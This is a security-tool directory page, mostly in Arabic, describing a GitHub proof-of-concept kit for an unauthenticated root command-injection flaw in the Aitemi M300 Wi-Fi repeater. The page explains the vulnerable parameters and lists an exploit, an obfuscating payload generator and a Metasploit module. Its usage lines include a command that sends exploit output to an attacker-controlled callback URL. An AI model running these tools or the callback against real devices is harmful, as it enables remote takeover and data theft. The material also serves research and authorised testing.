Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
أدوات/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-58457 - حقن أوامر نظام التشغيل دون مصادقة في مكرر واي-فاي Shenzhen Aitemi M300

[!WARNING] يُوفَّر هذا الكود كما هو (AS IS) لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الـ PoC على الأنظمة الإنتاجية أو البيئات المشتركة أو أي أهداف غير مصرَّح بها.

  • قد يؤدي تشغيل هذا الكود أو استضافته إلى إطلاق تنبيهات مكافحة الفيروسات أو تنبيهات مراقبة الأمان أو عواقب قانونية إذا أُسيء استخدامه.
  • لا يتحمل المؤلفون والمسؤولون عن المستودع أي مسؤولية عن أي ضرر أو إساءة استخدام أو نشاط غير قانوني ناتج عن هذا الكود.
  • استخدمه حصريًا في بيئات معملية معزولة وبعد الحصول على التصريح المناسب. مخصص للبحث الدفاعي وتحليل الثغرات واختبار الفريق الأزرق فقط.

ملخص الثغرة

توجد ثغرة حقن أوامر نظام التشغيل دون مصادقة في معالج smacfilter_conf. يتم تمرير معاملات GET التالية name وenable وmac دون تنقية إلى استدعاء sprintf() يُنشئ أوامر UCI تُنفَّذ بصلاحيات الجذر (root).

  • الخطورة: حرجة (CVSS 9.8)
  • الأثر: تنفيذ أوامر عن بُعد بصلاحيات الجذر دون الحاجة إلى مصادقة

الأدوات المرفقة

  • poc.py - استغلال كامل الميزات مع دعم HTTPS وإعادة المحاولة والمهلة الزمنية واستخراج البيانات عبر الاستدعاء الرجعي (callback).
  • val.py - أداة تحقق آمنة وسلبية من الثغرة (تستخدم أمر id غير الضار).
  • gen.py - مولّد حمولات متقدم مع تقنيات تمويه متعددة.
  • MITIGATIONS.md - إجراءات دفاعية موصى بها.
  • وحدة Metasploit - متاحة في مجلد exploit/.

التثبيت

root@kitploit:~
pip install requests

الاستخدام السريع

  1. التحقق (آمن)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. الاستغلال (للاختبار المصرَّح به فقط)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. توليد حمولات موهَّاة
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. انقل الوحدة
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. أعد تحميل كل شيء
root@kitploit:~
msfconsole -q -x "reload_all"

المراجع

  • CVE-2026-58457
  • نشرة VulnCheck الاستشارية
  • الإفصاح على GitHub

نرحب بالنجوم (Stars) والمساهمات - خاصة تحسينات الالتفافات أو إصدارات البرامج الثابتة الإضافية.

تنزيل الأداة